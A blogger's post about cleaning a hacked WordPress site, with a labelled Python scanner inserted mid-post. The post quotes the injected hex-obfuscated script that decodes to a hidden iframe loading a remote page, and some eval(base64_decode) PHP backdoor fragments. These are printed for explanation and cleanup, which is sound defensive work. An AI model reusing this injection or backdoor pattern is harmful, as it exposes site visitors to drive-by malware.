Spring Cleaning – Of Hacked Files
I do feel like I have to post an apology. Even though I try my best to stay virus free, apparently some still slip through. I recently decided I would upgrade the Wordpress version to a newer one, and ran into some difficulties/error messages and such, like the Wordpress Dashboard reloading or getting redirected to some URL like iss9w8s89xx.org or something. I’m not sure how long ago the blog was compromised, so my apologies to the visitors of the site.
After some searching I found the source and cause of my problems. Apparently it was caused by using CoreFTP and saving the password in that program, which some virus on my computer managed to get into, and which then got access to my Wordpress blog.
Especially noticeable was the code fragment that appeared at the bottom of every page:
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
After some searching around on the net, I found that this converts into:
<script language="javascript">eval(unescape("document.write('<iframe src=\"http://iss9w8s89xx.org/in.php\" width=1 height=1 frameborder=0></iframe>');"))</script>
If anyone is curious, I used a Java unescape decoder to decode the script.
Oddly enough, this code wasn’t in any of the files as such, but I later found out that many of the PHP files on my site had fragments of code like:
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvY
or
Y29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1
etc.
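As an added example (not code from the original post, and not grepWin), here is a small Python scanner that recognises both injection shapes described above, the eval(unescape("%XX...")) footer and the eval(base64_decode("...")) fragments in PHP files, and decodes them so a cleanup can be checked file by file. The sample page content is constructed here; the hex footer and the first base64 fragment are the ones quoted above.

```python
"""Scanner for the two injection shapes this post describes: eval(unescape("%XX...")) in
rendered pages and eval(base64_decode("...")) planted in PHP files. Added example with
constructed input; it is not the author's cleanup tool and not grepWin."""
import base64
import binascii
import re
from urllib.parse import unquote

Q = '["\'\u201c\u201d]'  # straight or curly quotes, as pasted from a browser
NQ = '[^"\'\u201c\u201d]+'
UNESCAPE_RE = re.compile(r"eval\s*\(\s*unescape\s*\(\s*" + Q + "(" + NQ + ")" + Q, re.I)
# Reported blobs are often cut off mid-way (as in the post), so padding is not required.
B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*" + Q + r"([A-Za-z0-9+/=]+)", re.I)

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX code points first, then %XX byte escapes."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode_base64_prefix(blob):
    """Decode a possibly truncated base64 blob: drop a dangling partial 4-char group so
    the readable prefix still comes out; return "" for anything malformed."""
    if len(blob) % 4:
        blob = blob[: len(blob) - len(blob) % 4]
    try:
        return base64.b64decode(blob).decode("latin-1")
    except binascii.Error:
        return ""

def find_injections(source):
    """Return (kind, decoded_payload) for every eval-wrapped blob in one file's text."""
    hits = [("js-unescape", js_unescape(m.group(1))) for m in UNESCAPE_RE.finditer(source)]
    hits += [("php-base64", decode_base64_prefix(m.group(1))) for m in B64_RE.finditer(source)]
    return hits

# Constructed sample: the truncated blob quoted in the post, a harmless blob built here,
# and the hex-escaped footer script from the post, all in one fake PHP page.
FOOTER_HEX = ("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22"
              "%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22"
              "%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30"
              "%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B")
HARMLESS = base64.b64encode(b"echo 'constructed sample';").decode()
SAMPLE = ('<?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvY")); ?>\n'
          "<?php eval(base64_decode('" + HARMLESS + "')); ?>\n"
          '<script language="javascript">eval(unescape("' + FOOTER_HEX + '"))</script>\n')
```

Run find_injections() over the text of each .php and .html file in a downloaded copy of the site; any file that returns hits still carries an eval-wrapped blob and needs cleaning, and the decoded payload shows what that blob does.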
If anyone else runs into similar issues with their blog, go to:
http://www.google.com/support/forum/p/Webmasters/thread?tid=6f4cf473c414de1f&hl=en
for the solution on how to fix/clean your Wordpress blog of the hack/backdoor.
Some other useful links for me this time around were:
How to find a backdoor in a hacked WordPress
http://tools.tortoisesvn.net/grepWin – program I used to strip the code from my pages.
Anyway, hopefully I managed to clear out all of the nasty scripts from the site, but if anyone notices anything abnormal, send a message through my contact form.
Some parts of the site, or links, may have become broken from cleaning/stripping the malicious code, so if you do notice anything, I would appreciate you bringing it up with me.